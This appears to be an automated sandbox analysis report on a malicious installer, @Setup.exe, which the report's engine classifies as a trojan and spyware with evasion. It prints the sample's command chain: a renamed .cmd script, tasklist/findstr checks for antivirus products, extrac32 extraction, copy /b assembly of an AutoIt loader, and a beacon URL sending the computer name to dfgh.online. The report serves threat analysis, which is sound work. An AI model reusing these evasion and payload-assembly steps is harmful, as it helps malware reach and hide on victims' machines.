      Source: Spotlight.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Spotlight.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertr
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertru
      Source: @Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: @Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: @Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: @Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
      Source: @Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/Sectig
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
      Source: BrightLib.exe, 00000032.00000002.2702726581.000000000625A000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000002.2699970820.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000000.2656238090.0000000000AEE000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2699234063.0000000003170000.00000004.00000020.00020000.00000000.sdmp, is-GC8MC.tmp.22.drString found in binary or memory: http://michaeluno.jp/
      Source: BrightLib.exe, 00000032.00000002.2699234063.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://michaeluno.jp/4
      Source: @Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: @Setup.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: @Setup.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: @Setup.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Spotlight.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://ocsp.sectigo.com0
      Source: Spotlight.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Spotlight.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Spotlight.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: @Setup.exeString found in binary or memory: http://ocsps.ssl.com0
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Spotlight.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Spotlight.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://subca.ocsp-certum.com01
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: BrightLib.exe, 00000032.00000000.2656181332.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2696752317.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-GC8MC.tmp.22.drString found in binary or memory: http://www.autohotkey.com
      Source: BrightLib.exe, 00000032.00000000.2656181332.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2696752317.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-GC8MC.tmp.22.drString found in binary or memory: http://www.autohotkey.comCould
      Source: Corporation.com, 0000000C.00000000.1695003459.0000000000F55000.00000002.00000001.01000000.00000007.sdmp, Spotlight.8.dr, Corporation.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://www.certum.pl/CPS0
      Source: BrightLib.exe, 00000032.00000002.2724573015.0000000039F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
      Source: powershell.exe, 00000011.00000002.2076683516.0000000007BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: @Setup.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
      Source: powershell.exe, 00000011.00000002.2072370241.0000000004F00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2072305436.0000000003710000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2071500735.0000000003500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
      Source: powershell.exe, 00000011.00000002.2076923392.0000000007BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compname=
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000011.00000002.2072630707.00000000058E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://jrsoftware.org/
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000000.2225738672.0000000000231000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://jrsoftware.org0
      Source: powershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://sectigo.com/CPS0D
      Source: Spotlight.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://www.certum.pl/CPS0
      Source: Spotlight.8.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2231893927.000000007F6CB000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2229028460.000000000290F000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000000.2235340133.0000000000021000.00000020.00000001.01000000.0000000B.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000000.2253869149.000000000102D000.00000020.00000001.01000000.0000000D.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drString found in binary or memory: https://www.innosetup.com/
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2231893927.000000007F6CB000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2229028460.000000000290F000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000000.2235340133.0000000000021000.00000020.00000001.01000000.0000000B.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000000.2253869149.000000000102D000.00000020.00000001.01000000.0000000D.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drString found in binary or memory: https://www.remobjects.com/ps
      Source: @Setup.exeString found in binary or memory: https://www.ssl.com/repository0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1

      System Summary

      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Windows\ExtractLiberty
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Windows\AnthonyCognitive
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Windows\TwikiReminder
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Windows\SpanSkilled
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004049A80_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
      Source: C:\Users\user\Desktop\@Setup.exeCode function: String function: 004062CF appears 58 times
      Source: @Setup.exeStatic PE information: invalid certificate
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drStatic PE information: Number of sections : 11 > 10
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe.12.drStatic PE information: Number of sections : 11 > 10
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.21.drStatic PE information: Number of sections : 11 > 10
      Source: @Setup.exe, 00000000.00000002.1666807792.00000000007A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs @Setup.exe
      Source: @Setup.exe, 00000000.00000003.1666253862.00000000007A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs @Setup.exe
      Source: @Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@84/35@5/3
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jeep
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3896:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1168:120:WilError_03
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsdCE11.tmp
      Source: @Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
      Source: C:\Users\user\Desktop\@Setup.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
      Source: @Setup.exeVirustotal: Detection: 23%
      Source: @Setup.exeReversingLabs: Detection: 15%
      Source: C:\Users\user\Desktop\@Setup.exeFile read: C:\Users\user\Desktop\@Setup.exeJump to behavior
      Source: unknown Process created: C:\Users\user\Desktop\@Setup.exe "C:\Users\user\Desktop\@Setup.exe"
      Source: C:\Users\user\Desktop\@Setup.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Pl Pl.cmd & Pl.cmd
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 504701
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Cc
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Housewares" Expressions
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 504701\Corporation.com + Minister + Tobacco + Secrets + Nervous + Sparc + Beginning + Marathon + Fame + Spotlight 504701\Corporation.com
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wa + ..\Parade + ..\Easier + ..\Marc + ..\Olympics + ..\Emergency + ..\Jeep u
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com Corporation.com u
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
